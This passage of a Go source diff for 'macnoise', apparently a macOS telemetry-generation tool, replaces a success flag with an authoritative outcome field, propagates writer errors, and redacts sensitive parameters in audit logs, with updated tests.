-		_, _ = fmt.Fprintf(w, `{"error":"failed to marshal event: %s"}`+"\n", err)
-		return
+		return fmt.Errorf("marshal event: %w", err)
 	}
-	_, _ = fmt.Fprintln(w, string(b))
+	if _, err := fmt.Fprintln(w, string(b)); err != nil {
+		return fmt.Errorf("write JSONL event: %w", err)
+	}
+	return nil
 }
 
 // humanMarker distinguishes the four outcomes at a glance. A denial and an
@@ -82,21 +91,26 @@ func humanMarker(outcome module.Outcome) string {
 	}
 }
 
-func (e *Emitter) writeHuman(w io.Writer, ev module.TelemetryEvent) {
-	status := humanMarker(ev.ResolvedOutcome())
+func (e *Emitter) writeHuman(w io.Writer, ev module.TelemetryEvent) error {
+	status := humanMarker(ev.Outcome)
 	ts := ev.Timestamp.Format("15:04:05")
-	_, _ = fmt.Fprintf(w, "[%s] [%s] [%s/%s] %s\n", status, ts, ev.Category, ev.Module, ev.Message)
+	if _, err := fmt.Fprintf(w, "[%s] [%s] [%s/%s] %s\n", status, ts, ev.Category, ev.Module, ev.Message); err != nil {
+		return fmt.Errorf("write human event: %w", err)
+	}
 	if ev.Error != "" {
-		_, _ = fmt.Fprintf(w, "    error: %s\n", ev.Error)
+		if _, err := fmt.Fprintf(w, "    error: %s\n", ev.Error); err != nil {
+			return fmt.Errorf("write human error: %w", err)
+		}
 	}
 	for k, v := range ev.Details {
-		_, _ = fmt.Fprintf(w, "    %s: %v\n", k, v)
+		if _, err := fmt.Fprintf(w, "    %s: %v\n", k, v); err != nil {
+			return fmt.Errorf("write human detail: %w", err)
+		}
 	}
+	return nil
 }
 
 // EmitFunc returns an EventEmitter function backed by this Emitter.
 func (e *Emitter) EmitFunc() module.EventEmitter {
-	return func(ev module.TelemetryEvent) {
-		e.Emit(ev)
-	}
+	return e.Emit
 }

--- a/internal/output/event.go
+++ b/internal/output/event.go
@@ -1,6 +1,7 @@
 package output
 
 import (
+	"fmt"
 	"os"
 	"os/exec"
 	"os/user"
@@ -9,26 +10,55 @@ import (
 	"strconv"
 	"strings"
 	"sync"
+	"time"
 
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
 // SchemaVersion is the telemetry event schema version embedded in every event.
-// 1.1 added the outcome field.
-const SchemaVersion = "1.1"
+// 2.0 makes outcome authoritative and adds typed subjects.
+const SchemaVersion = "2.0"
 
 // NewEvent constructs a TelemetryEvent pre-populated with module metadata and process context.
-func NewEvent(mod module.ModuleInfo, eventType string, success bool, message string) module.TelemetryEvent {
+func NewEvent(mod module.ModuleInfo, eventType string, outcome module.Outcome, subject module.Subject, message string) module.TelemetryEvent {
 	return module.TelemetryEvent{
 		SchemaVersion:  SchemaVersion,
 		Module:         mod.Name,
 		Category:       string(mod.Category),
 		EventType:      eventType,
-		Success:        success,
+		Outcome:        outcome,
+		Subject:        subject,
 		Message:        message,
 		MITRE:          mod.MITRE,
 		ProcessContext: currentProcessContext(),
 	}
+}
+
+// NormalizeEvent applies the authoritative module identity and emission time,
+// then validates the event contract before it reaches any writer.
+func NormalizeEvent(info module.ModuleInfo, ev module.TelemetryEvent) (module.TelemetryEvent, error) {
+	ev.SchemaVersion = SchemaVersion
+	ev.Module = info.Name
+	ev.Category = string(info.Category)
+	ev.MITRE = append([]module.MITRE(nil), info.MITRE...)
+	ev.ProcessContext = currentProcessContext()
+	return prepareEvent(ev)
+}
+
+func prepareEvent(ev module.TelemetryEvent) (module.TelemetryEvent, error) {
+	ev.SchemaVersion = SchemaVersion
+	if !ev.Outcome.Valid() {
+		return module.TelemetryEvent{}, fmt.Errorf("event %q has invalid outcome %q", ev.EventType, ev.Outcome)
+	}
+	if err := ev.Subject.Validate(); err != nil {
+		return module.TelemetryEvent{}, fmt.Errorf("event %q subject: %w", ev.EventType, err)
+	}
+	if ev.Timestamp.IsZero() {
+		ev.Timestamp = time.Now().UTC()
+	} else {
+		ev.Timestamp = ev.Timestamp.UTC()
+	}
+	return ev, nil
 }
 
 // CurrentProcessContext returns the ProcessContext for the running macnoise process.
@@ -58,19 +88,23 @@ func parentProcessName() string {
 var (
 	parentNameOnce sync.Once
 	parentName     string
+	processOnce    sync.Once
+	processContext module.ProcessContext
 )
 
 func currentProcessContext() module.ProcessContext {
-	pc := module.ProcessContext{
-		PID:        os.Getpid(),
-		PPID:       os.Getppid(),
-		ParentName: parentProcessName(),
-		Executable: executablePath(),
-	}
-	if u, err := user.Current(); err == nil {
-		pc.Username = u.Username
-	}
-	return pc
+	processOnce.Do(func() {
+		processContext = module.ProcessContext{
+			PID:        os.Getpid(),
+			PPID:       os.Getppid(),
+			ParentName: parentProcessName(),
+			Executable: executablePath(),
+		}
+		if u, err := user.Current(); err == nil {
+			processContext.Username = u.Username
+		}
+	})
+	return processContext
 }
 
 func executablePath() string {
@@ -90,8 +124,8 @@ func WithDetails(ev module.TelemetryEvent, details map[string]any) module.Teleme
 	return ev
 }
 
-// WithError returns a copy of ev marked as a macnoise failure: Success false,
-// Outcome error, Error populated from err.
+// WithError returns a copy of ev marked as a macnoise failure with OutcomeError
+// and Error populated from err.
 //
 // Reach for WithOutcome instead when err describes the environment refusing or
 // not answering the action rather than macnoise breaking. A refused connection
@@ -99,18 +133,15 @@ func WithDetails(ev module.TelemetryEvent, details map[string]any) module.Teleme
 // and recording it here makes it indistinguishable from one.
 func WithError(ev module.TelemetryEvent, err error) module.TelemetryEvent {
 	ev.Error = err.Error()
-	ev.Success = false
 	ev.Outcome = module.OutcomeError
 	return ev
 }
 
-// WithOutcome returns a copy of ev with outcome set, keeping Success in sync so
-// the two fields can never disagree. Pass a non-nil err to record why the
-// action was refused or left undecided; unlike WithError that error does not
-// mark the event as a tool failure.
+// WithOutcome returns a copy of ev with outcome set. Pass a non-nil err to
+// record why the action was refused or left undecided; unlike WithError that
+// error does not mark the event as a tool failure.
 func WithOutcome(ev module.TelemetryEvent, outcome module.Outcome, err error) module.TelemetryEvent {
 	ev.Outcome = outcome
-	ev.Success = outcome != module.OutcomeError
 	if err != nil {
 		ev.Error = err.Error()
 	}

--- a/internal/output/outcome_test.go
+++ b/internal/output/outcome_test.go
@@ -2,7 +2,6 @@ package output_test
 
 import (
 	"bytes"
-	"encoding/json"
 	"errors"
 	"strings"
 	"testing"
@@ -15,29 +14,19 @@ func outcomeModuleInfo() module.ModuleInfo {
 	return module.ModuleInfo{Name: "test_module", Category: module.CategoryTCC}
 }
 
-// A denied action and a broken tool must not look the same. Before the outcome
-// field the only way to express "the probe was refused" was Success plus prose,
-// which a consumer cannot filter on.
-func TestWithOutcomeKeepsSuccessInSync(t *testing.T) {
-	cases := []struct {
-		outcome     module.Outcome
-		wantSuccess bool
-	}{
-		{module.OutcomeExecuted, true},
-		{module.OutcomeDenied, true},
-		{module.OutcomeIndeterminate, true},
-		{module.OutcomeError, false},
-	}
+// A denied action and a broken tool must not look the same.
+func TestWithOutcomeSetsAuthoritativeOutcome(t *testing.T) {
+	for _, outcome := range []module.Outcome{
+		module.OutcomeExecuted,
+		module.OutcomeDenied,
+		module.OutcomeIndeterminate,
+		module.OutcomeError,
+	} {
+		ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", module.OutcomeExecuted, module.Resource("tcc", "fda", "/tmp/TCC.db"), "probing")
+		ev = output.WithOutcome(ev, outcome, nil)
 
-	for _, tc := range cases {
-		ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", true, "probing")
-		ev = output.WithOutcome(ev, tc.outcome, nil)
-
-		if ev.Outcome != tc.outcome {
-			t.Errorf("%s: outcome = %q, want %q", tc.outcome, ev.Outcome, tc.outcome)
-		}
-		if ev.Success != tc.wantSuccess {
-			t.Errorf("%s: success = %v, want %v", tc.outcome, ev.Success, tc.wantSuccess)
+		if ev.Outcome != outcome {
+			t.Errorf("%s: outcome = %q, want %q", outcome, ev.Outcome, outcome)
 		}
 	}
 }
@@ -45,14 +34,11 @@ func TestWithOutcomeKeepsSuccessInSync(t *testing.T) {
 // The error recorded alongside a denial explains the refusal. It must not flip
 // the event into a tool failure the way WithError does.
 func TestWithOutcomeErrorDoesNotMarkFailure(t *testing.T) {
-	ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", true, "probing")
+	ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", module.OutcomeExecuted, module.Resource("tcc", "fda", "/tmp/TCC.db"), "probing")
 	ev = output.WithOutcome(ev, module.OutcomeDenied, errors.New("permission denied"))
 
 	if ev.Error != "permission denied" {
 		t.Errorf("error = %q, want %q", ev.Error, "permission denied")
-	}
-	if !ev.Success {
-		t.Error("a denial recorded an error and was marked as a macnoise failure")
 	}
 	if ev.Outcome != module.OutcomeDenied {
 		t.Errorf("outcome = %q, want %q", ev.Outcome, module.OutcomeDenied)
@@ -60,48 +46,21 @@ func TestWithOutcomeErrorDoesNotMarkFailure(t *testing.T) {
 }
 
 func TestWithErrorSetsErrorOutcome(t *testing.T) {
-	ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", true, "probing")
+	ev := output.NewEvent(outcomeModuleInfo(), "tcc_fda_probe", module.OutcomeExecuted, module.Resource("tcc", "fda", "/tmp/TCC.db"), "probing")
 	ev = output.WithError(ev, errors.New("i/o error"))
 
 	if ev.Outcome != module.OutcomeError {
 		t.Errorf("outcome = %q, want %q", ev.Outcome, module.OutcomeError)
 	}
-	if ev.Success {
-		t.Error("WithError left Success true")
-	}
 }
 
-// Modules overwhelmingly never set an outcome, so an emitted record has to
-// carry one anyway or a consumer cannot rely on the field being there.
-func TestEmittedJSONAlwaysCarriesOutcome(t *testing.T) {
-	cases := []struct {
-		name string
-		ev   module.TelemetryEvent
-		want string
-	}{
-		{"unset and successful", module.TelemetryEvent{Success: true}, "executed"},
-		{"unset and failed", module.TelemetryEvent{Success: false}, "error"},
-		{"explicitly denied", module.TelemetryEvent{Success: true, Outcome: module.OutcomeDenied}, "denied"},
-		{
-			"explicitly indeterminate",
-			module.TelemetryEvent{Success: true, Outcome: module.OutcomeIndeterminate},
-			"indeterminate",
-		},
-	}
-
-	for _, tc := range cases {
-		t.Run(tc.name, func(t *testing.T) {
-			var buf bytes.Buffer
-			output.NewEmitter(output.FormatJSONL, &buf).Emit(tc.ev)
-
-			var m map[string]any
-			if err := json.Unmarshal(buf.Bytes(), &m); err != nil {
-				t.Fatalf("invalid JSON: %v", err)
-			}
-			if got := m["outcome"]; got != tc.want {
-				t.Errorf("outcome = %v, want %q", got, tc.want)
-			}
-		})
+func TestEmitterRejectsMissingOutcome(t *testing.T) {
+	var buf bytes.Buffer
+	err := output.NewEmitter(output.FormatJSONL, &buf).Emit(module.TelemetryEvent{
+		Subject: module.Resource("test", "subject", ""),
+	})
+	if err == nil || !strings.Contains(err.Error(), "invalid outcome") {
+		t.Fatalf("Emit() error = %v, want invalid outcome", err)
 	}
 }
 
@@ -120,7 +79,9 @@ func TestHumanMarkerPerOutcome(t *testing.T) {
 		var buf bytes.Buffer
 		ev := sampleEvent()
 		ev.Outcome = tc.outcome
-		output.NewEmitter(output.FormatHuman, &buf).Emit(ev)
+		if err := output.NewEmitter(output.FormatHuman, &buf).Emit(ev); err != nil {
+			t.Fatal(err)
+		}
 
 		if !strings.Contains(buf.String(), tc.want) {
 			t.Errorf("%s: expected marker %s, got %q", tc.outcome, tc.want, buf.String())
@@ -129,7 +90,7 @@ func TestHumanMarkerPerOutcome(t *testing.T) {
 }
 
 func TestSchemaVersionBumped(t *testing.T) {
-	if output.SchemaVersion != "1.1" {
-		t.Errorf("SchemaVersion = %q, want 1.1 (outcome field added)", output.SchemaVersion)
+	if output.SchemaVersion != "2.0" {
+		t.Errorf("SchemaVersion = %q, want 2.0", output.SchemaVersion)
 	}
 }

--- a/internal/output/output_test.go
+++ b/internal/output/output_test.go
@@ -3,6 +3,7 @@ package output_test
 import (
 	"bytes"
 	"encoding/json"
+	"errors"
 	"strings"
 	"sync"
 	"testing"
@@ -19,7 +20,8 @@ func sampleEvent() module.TelemetryEvent {
 		Module:        "test_module",
 		Category:      "network",
 		EventType:     "tcp_connect",
-		Success:       true,
+		Outcome:       module.OutcomeExecuted,
+		Subject:       module.Network("127.0.0.1:443", "", ""),
 		Message:       "test message",
 	}
 }
@@ -27,7 +29,9 @@ func sampleEvent() module.TelemetryEvent {
 func TestJSONLOutputIsValidJSON(t *testing.T) {
 	var buf bytes.Buffer
 	em := output.NewEmitter(output.FormatJSONL, &buf)
-	em.Emit(sampleEvent())
+	if err := em.Emit(sampleEvent()); err != nil {
+		t.Fatal(err)
+	}
 
 	line := strings.TrimSpace(buf.String())
 	if !strings.HasPrefix(line, "{") {
@@ -42,23 +46,33 @@ func TestJSONLOutputIsValidJSON(t *testing.T) {
 func TestJSONLContainsRequiredFields(t *testing.T) {
 	var buf bytes.Buffer
 	em := output.NewEmitter(output.FormatJSONL, &buf)
-	em.Emit(sampleEvent())
+	if err := em.Emit(sampleEvent()); err != nil {
+		t.Fatal(err)
+	}
 
 	var m map[string]any
 	json.Unmarshal(buf.Bytes(), &m)
 
-	required := []string{"schema_version", "timestamp", "module", "category", "event_type", "success", "message"}
+	required := []string{"schema_version", "timestamp", "module", "category", "event_type", "outcome", "subject", "message"}
 	for _, field := range required {
 		if _, ok := m[field]; !ok {
 			t.Errorf("missing required field: %s", field)
 		}
+	}
+	if got := m["schema_version"]; got != output.SchemaVersion {
+		t.Errorf("schema_version = %v, want %s", got, output.SchemaVersion)
+	}
+	if _, ok := m["success"]; ok {
+		t.Error("success must not be emitted alongside authoritative outcome")
 	}
 }
 
 func TestHumanOutputContainsMessage(t *testing.T) {
 	var buf bytes.Buffer
 	em := output.NewEmitter(output.FormatHuman, &buf)
-	em.Emit(sampleEvent())
+	if err := em.Emit(sampleEvent()); err != nil {
+		t.Fatal(err)
+	}
 
 	out := buf.String()
 	if !strings.Contains(out, "test message") {
@@ -69,20 +83,24 @@ func TestHumanOutputContainsMessage(t *testing.T) {
 	}
 }
 
-func TestHumanSuccessPrefix(t *testing.T) {
+func TestHumanOutcomePrefix(t *testing.T) {
 	var buf bytes.Buffer
 	em := output.NewEmitter(output.FormatHuman, &buf)
 
 	ev := sampleEvent()
-	ev.Success = true
-	em.Emit(ev)
+	ev.Outcome = module.OutcomeExecuted
+	if err := em.Emit(ev); err != nil {
+		t.Fatal(err)
+	}
 	if !strings.Contains(buf.String(), "[+]") {
 		t.Error("expected [+] prefix for success event")
 	}
 
 	buf.Reset()
-	ev.Success = false
-	em.Emit(ev)
+	ev.Outcome = module.OutcomeError
+	if err := em.Emit(ev); err != nil {
+		t.Fatal(err)
+	}
 	if !strings.Contains(buf.String(), "[!]") {
 		t.Error("expected [!] prefix for failure event")
 	}
@@ -91,7 +109,9 @@ func TestHumanSuccessPrefix(t *testing.T) {
 func TestMultiWriter(t *testing.T) {
 	var buf1, buf2 bytes.Buffer
 	em := output.NewEmitter(output.FormatHuman, &buf1, &buf2)
-	em.Emit(sampleEvent())
+	if err := em.Emit(sampleEvent()); err != nil {
+		t.Fatal(err)
+	}
 
 	if buf1.Len() == 0 {
 		t.Error("writer 1 received no output")
@@ -110,7 +130,9 @@ func TestThreadSafety(t *testing.T) {
 		wg.Add(1)
 		go func() {
 			defer wg.Done()
-			em.Emit(sampleEvent())
+			if err := em.Emit(sampleEvent()); err != nil {
+				t.Errorf("Emit: %v", err)
+			}
 		}()
 	}
 	wg.Wait()
@@ -132,12 +154,52 @@ func TestEmitFuncTimestamp(t *testing.T) {
 
 	ev := sampleEvent()
 	ev.Timestamp = time.Time{}
-	em.Emit(ev)
+	if err := em.Emit(ev); err != nil {
+		t.Fatal(err)
+	}
 
 	var m map[string]any
 	json.Unmarshal(buf.Bytes(), &m)
 	ts, ok := m["timestamp"].(string)
 	if !ok || ts == "" {
 		t.Error("expected non-empty timestamp in output")
+	}
+}
+
+type errorWriter struct{ err error }
+
+func (w errorWriter) Write([]byte) (int, error) { return 0, w.err }
+
+func TestEmitReturnsWriterFailureAndContinuesOtherWriters(t *testing.T) {
+	wantErr := errors.New("disk full")
+	var good bytes.Buffer
+	em := output.NewEmitter(output.FormatJSONL, errorWriter{err: wantErr}, &good)
+
+	err := em.Emit(sampleEvent())
+	if !errors.Is(err, wantErr) {
+		t.Fatalf("Emit() error = %v, want disk full", err)
+	}
+	if good.Len() == 0 {
+		t.Error("healthy writer did not receive the event")
+	}
+}
+
+func TestNormalizeEventUsesAuthoritativeIdentityAndOneTimestamp(t *testing.T) {
+	info := module.ModuleInfo{Name: "real_module", Category: module.CategoryFile, MITRE: []module.MITRE{{Technique: "T1000"}}}
+	ev := sampleEvent()
+	ev.SchemaVersion = "old"
+	ev.Module = "wrong"
+	ev.Category = "wrong"
+	ev.Timestamp = time.Time{}
+
+	got, err := output.NormalizeEvent(info, ev)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got.SchemaVersion != output.SchemaVersion || got.Module != info.Name || got.Category != string(info.Category) {
+		t.Errorf("identity was not normalized: %+v", got)
+	}
+	if got.Timestamp.IsZero() || got.Timestamp.Location() != time.UTC {
+		t.Errorf("timestamp = %v, want non-zero UTC", got.Timestamp)
 	}
 }

--- a/internal/runner/nocleanup_test.go
+++ b/internal/runner/nocleanup_test.go
@@ -16,7 +16,7 @@ import (
 func TestRunSingle_CleanupRunsByDefault(t *testing.T) {
 	gen := &mockGen{name: "mock_default_cleanup"}
 
-	if err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{}); err != nil {
+	if err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, runner.Options{}); err != nil {
 		t.Fatalf("RunSingle: %v", err)
 	}
 	if !gen.cleanedUp {
@@ -30,7 +30,7 @@ func TestRunSingle_NoCleanupLeavesArtifacts(t *testing.T) {
 	gen := &mockGen{name: "mock_no_cleanup"}
 
 	opts := runner.Options{NoCleanup: true}
-	if err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, opts); err != nil {
+	if err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, opts); err != nil {
 		t.Fatalf("RunSingle: %v", err)
 	}
 	if gen.cleanedUp {
@@ -61,7 +61,7 @@ func TestRunSingle_NoCleanupIsRecordedAsSkipped(t *testing.T) {
 
 			gen := &mockGen{name: "mock_audit_cleanup"}
 			opts := runner.Options{NoCleanup: tt.noCleanup, AuditLog: logger}
-			if err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, opts); err != nil {
+			if err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, opts); err != nil {
 				t.Fatalf("RunSingle: %v", err)
 			}
 			if err := logger.Close(); err != nil {

--- a/internal/runner/runner.go
+++ b/internal/runner/runner.go
@@ -10,9 +10,11 @@ import (
 	"errors"
 	"fmt"
 	"os"
+	"sync"
 	"time"
 
 	"github.com/0xv1n/macnoise/internal/audit"
+	"github.com/0xv1n/macnoise/internal/output"
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
@@ -41,6 +43,7 @@ func RunSingle(ctx context.Context, gen module.Generator, params module.Params, 
 		return fmt.Errorf("[%s] params: %w", info.Name, err)
 	}
 	params = normalized
+	auditParams := module.RedactParams(gen.ParamSpecs(), params)
 	startTime := time.Now()
 
 	lifecycle := audit.LifecycleData{
@@ -63,7 +66,8 @@ func RunSingle(ctx context.Context, gen module.Generator, params module.Params, 
 			lifecycle.PrereqError = err.Error()
 			if opts.AuditLog != nil {
 				lifecycle.EndTime = time.Now()
-				opts.AuditLog.LogLifecycle("module_prereq_fail", info, params, lifecycle)
+				auditErr := opts.AuditLog.LogLifecycle("module_prereq_fail", info, auditParams, lifecycle)
+				return errors.Join(fmt.Errorf("[%s] prereqs: %w", info.Name, err), auditErr)
 			}
 			return fmt.Errorf("[%s] prereqs: %w", info.Name, err)
 		}
@@ -76,15 +80,31 @@ func RunSingle(ctx context.Context, gen module.Generator, params module.Params, 
 		}
 		if opts.AuditLog != nil {
 			lifecycle.EndTime = time.Now()
-			opts.AuditLog.LogLifecycle("module_dry_run", info, params, lifecycle)
+			if err := opts.AuditLog.LogLifecycle("module_dry_run", info, auditParams, lifecycle); err != nil {
+				return err
+			}
 		}
 		return nil
 	}
 
 	var eventsEmitted int
-	auditEmit := emit
+	eventEmit := emit
 	if opts.AuditLog != nil {
-		auditEmit = opts.AuditLog.WrapEmitter(emit, info, params, &eventsEmitted)
+		eventEmit = opts.AuditLog.WrapEmitter(emit, info, auditParams, &eventsEmitted)
+	}
+	var emitMu sync.Mutex
+	var emitErr error
+	normalizedEmit := func(ev module.TelemetryEvent) error {
+		ev, err := output.NormalizeEvent(info, ev)
+		if err == nil {
+			err = eventEmit(ev)
+		}
+		if err != nil {
+			emitMu.Lock()
+			emitErr = errors.Join(emitErr, err)
+			emitMu.Unlock()
+		}
+		return err
 	}
 
 	var generateErr error
@@ -116,11 +136,18 @@ func RunSingle(ctx context.Context, gen module.Generator, params module.Params, 
 			if generateErr != nil {
 				lifecycle.GenerateError = generateErr.Error()
 			}
-			opts.AuditLog.LogLifecycle("module_run", info, params, lifecycle)
+			if err := opts.AuditLog.LogLifecycle("module_run", info, auditParams, lifecycle); err != nil {
+				resultErr = errors.Join(resultErr, err)
+			}
 		}
 	}()
 
-	generateErr = gen.Generate(runCtx, params, auditEmit)
+	generateErr = gen.Generate(runCtx, params, normalizedEmit)
+	emitMu.Lock()
+	if emitErr != nil && !errors.Is(generateErr, emitErr) {
+		generateErr = errors.Join(generateErr, emitErr)
+	}
+	emitMu.Unlock()
 	if runCtx.Err() != nil {
 		generateErr = errors.Join(generateErr, runCtx.Err())
 	}
@@ -246,7 +273,9 @@ stepLoop:
 		case stepsFailed > 0:
 			ld.GenerateError = fmt.Sprintf("%d step(s) failed", stepsFailed)
 		}
-		opts.AuditLog.LogScenario(sc.Name, path, ld)
+		if err := opts.AuditLog.LogScenario(sc.Name, path, ld); err != nil {
+			interruptErr = errors.Join(interruptErr, err)
+		}
 	}
 
 	if interruptErr != nil {

--- a/internal/runner/runner_test.go
+++ b/internal/runner/runner_test.go
@@ -35,6 +35,8 @@ type mockGen struct {
 	generateCalls int
 }
 
+func discardEvent(module.TelemetryEvent) error { return nil }
+
 func (m *mockGen) Info() module.ModuleInfo {
 	category := m.category
 	if category == "" {
@@ -54,7 +56,9 @@ func (m *mockGen) Generate(_ context.Context, params module.Params, emit module.
 		m.onGenerate()
 	}
 	for _, ev := range m.events {
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return errors.Join(m.generateErr, err)
+		}
 	}
 	return m.generateErr
 }
@@ -77,7 +81,7 @@ func TestRunSingleRejectsInvalidParamsBeforePreviewOrExecution(t *testing.T) {
 				paramSpecs: []module.ParamSpec{{Name: "count", Type: module.ParamInteger}},
 			}
 
-			err := runner.RunSingle(context.Background(), gen, module.Params{"count": "many"}, func(module.TelemetryEvent) {}, runner.Options{DryRun: dryRun})
+			err := runner.RunSingle(context.Background(), gen, module.Params{"count": "many"}, discardEvent, runner.Options{DryRun: dryRun})
 			if err == nil || !strings.Contains(err.Error(), `parameter "count" must be an integer`) {
 				t.Fatalf("RunSingle error = %v", err)
 			}
@@ -96,7 +100,7 @@ func TestRunSingleUsesSameNormalizationForPreviewAndExecution(t *testing.T) {
 				paramSpecs: []module.ParamSpec{{Name: "count", Type: module.ParamInteger, Default: 3}},
 			}
 
-			if err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{DryRun: dryRun}); err != nil {
+			if err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, runner.Options{DryRun: dryRun}); err != nil {
 				t.Fatal(err)
 			}
 			if got := gen.params.Int("count", 0); got != 3 {
@@ -107,7 +111,7 @@ func TestRunSingleUsesSameNormalizationForPreviewAndExecution(t *testing.T) {
 }
 
 func TestRunSingleSuccess(t *testing.T) {
-	ev := module.TelemetryEvent{Module: "mock", Success: true, Message: "ok"}
+	ev := module.TelemetryEvent{Module: "mock", Outcome: module.OutcomeExecuted, Subject: module.Resource("test", "mock", ""), Message: "ok"}
 	gen := &mockGen{
 		name:        "mock_success",
 		events:      []module.TelemetryEvent{ev},
@@ -115,7 +119,10 @@ func TestRunSingleSuccess(t *testing.T) {
 	}
 
 	var received []module.TelemetryEvent
-	emit := func(e module.TelemetryEvent) { received = append(received, e) }
+	emit := func(e module.TelemetryEvent) error {
+		received = append(received, e)
+		return nil
+	}
 
 	err := runner.RunSingle(context.Background(), gen, module.Params{}, emit, runner.Options{})
 	if err != nil {
@@ -129,10 +136,70 @@ func TestRunSingleSuccess(t *testing.T) {
 	}
 }
 
+type ignoresEmitterFailureGen struct {
+	mockGen
+}
+
+func (g *ignoresEmitterFailureGen) Generate(_ context.Context, _ module.Params, emit module.EventEmitter) error {
+	g.generateCalls++
+	_ = emit(module.TelemetryEvent{
+		Outcome: module.OutcomeExecuted,
+		Subject: module.Resource("test", "event", ""),
+	})
+	return nil
+}
+
+func TestRunSingleReturnsIgnoredEmitterFailure(t *testing.T) {
+	want := errors.New("telemetry write failed")
+	gen := &ignoresEmitterFailureGen{mockGen: mockGen{name: "writer_failure"}}
+
+	err := runner.RunSingle(context.Background(), gen, nil, func(module.TelemetryEvent) error {
+		return want
+	}, runner.Options{})
+	if !errors.Is(err, want) {
+		t.Fatalf("RunSingle = %v, want telemetry write failure", err)
+	}
+	if !gen.cleanedUp {
+		t.Fatal("cleanup did not run after telemetry write failure")
+	}
+}
+
+func TestRunSingleRedactsSensitiveAuditParams(t *testing.T) {
+	const secret = "correct-horse-battery-staple"
+	auditPath := filepath.Join(t.TempDir(), "audit.jsonl")
+	logger, err := audit.NewLogger(auditPath, "test", "run")
+	if err != nil {
+		t.Fatal(err)
+	}
+	gen := &mockGen{
+		name: "sensitive_params",
+		paramSpecs: []module.ParamSpec{
+			{Name: "password", Type: module.ParamString, Sensitive: true},
+		},
+	}
+
+	if err := runner.RunSingle(context.Background(), gen, module.Params{"password": secret}, discardEvent, runner.Options{AuditLog: logger}); err != nil {
+		t.Fatal(err)
+	}
+	if err := logger.Close(); err != nil {
+		t.Fatal(err)
+	}
+	data, err := os.ReadFile(auditPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if strings.Contains(string(data), secret) {
+		t.Fatal("audit log contains sensitive parameter value")
+	}
+	if !strings.Contains(string(data), module.RedactedValue) {
+		t.Fatal("audit log does not contain redaction marker")
+	}
+}
+
 func TestRunSingleReturnsCleanupError(t *testing.T) {
 	want := errors.New("cleanup failed")
 	gen := &mockGen{name: "cleanup_error", cleanupErr: want}
-	err := runner.RunSingle(context.Background(), gen, nil, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunSingle(context.Background(), gen, nil, discardEvent, runner.Options{})
 	if !errors.Is(err, want) {
 		t.Fatalf("RunSingle = %v, want cleanup failure", err)
 	}
@@ -142,7 +209,7 @@ func TestRunSingleJoinsGenerateAndCleanupErrors(t *testing.T) {
 	generateErr := errors.New("generation failed")
 	cleanupErr := errors.New("cleanup failed")
 	gen := &mockGen{name: "joined_errors", generateErr: generateErr, cleanupErr: cleanupErr}
-	err := runner.RunSingle(context.Background(), gen, nil, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunSingle(context.Background(), gen, nil, discardEvent, runner.Options{})
 	if !errors.Is(err, generateErr) || !errors.Is(err, cleanupErr) {
 		t.Fatalf("RunSingle = %v, want both generation and cleanup failures", err)
 	}
@@ -157,7 +224,7 @@ func TestRunScenarioAuditDoesNotChangeFailurePolicy(t *testing.T) {
 				return &mockGen{
 					name:        name,
 					generateErr: errors.New("execution failed"),
-					events:      []module.TelemetryEvent{{Success: true}},
+					events:      []module.TelemetryEvent{{Outcome: module.OutcomeExecuted, Subject: module.Resource("test", "event", "")}},
 				}
 			})
 			var logger *audit.Logger
@@ -171,7 +238,10 @@ func TestRunScenarioAuditDoesNotChangeFailurePolicy(t *testing.T) {
 			}
 			path := writeScenario(t, name, 2, "")
 			calls := 0
-			err := runner.RunScenario(context.Background(), path, func(module.TelemetryEvent) { calls++ }, runner.Options{
+			err := runner.RunScenario(context.Background(), path, func(module.TelemetryEvent) error {
+				calls++
+				return nil
+			}, runner.Options{
 				Registry: &registry,
 				AuditLog: logger,
 			})
@@ -187,7 +257,7 @@ func TestRunSinglePrereqFails(t *testing.T) {
 		name:      "mock_prereq_fail",
 		prereqErr: errors.New("not root"),
 	}
-	err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, runner.Options{})
 	if err == nil {
 		t.Error("expected error when prereqs fail")
 	}
@@ -200,7 +270,7 @@ func TestRunSingleDryRun(t *testing.T) {
 		dryRunLines: []string{"action one", "action two"},
 		generateErr: errors.New("should not run"),
 	}
-	err := runner.RunSingle(context.Background(), gen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{DryRun: true})
+	err := runner.RunSingle(context.Background(), gen, module.Params{}, discardEvent, runner.Options{DryRun: true})
 	if err != nil {
 		t.Fatalf("dry-run should not fail: %v", err)
 	}
@@ -212,7 +282,7 @@ func TestRunSingleDryRun(t *testing.T) {
 func TestRunSingleTimeout(t *testing.T) {
 	slowGen := &slowMockGen{name: "mock_slow", delay: 2 * time.Second}
 
-	err := runner.RunSingle(context.Background(), slowGen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{Timeout: 50 * time.Millisecond})
+	err := runner.RunSingle(context.Background(), slowGen, module.Params{}, discardEvent, runner.Options{Timeout: 50 * time.Millisecond})
 	if !errors.Is(err, context.DeadlineExceeded) {
 		t.Errorf("RunSingle = %v, want context deadline exceeded", err)
 	}
@@ -226,7 +296,7 @@ func TestRunManyCollectsErrors(t *testing.T) {
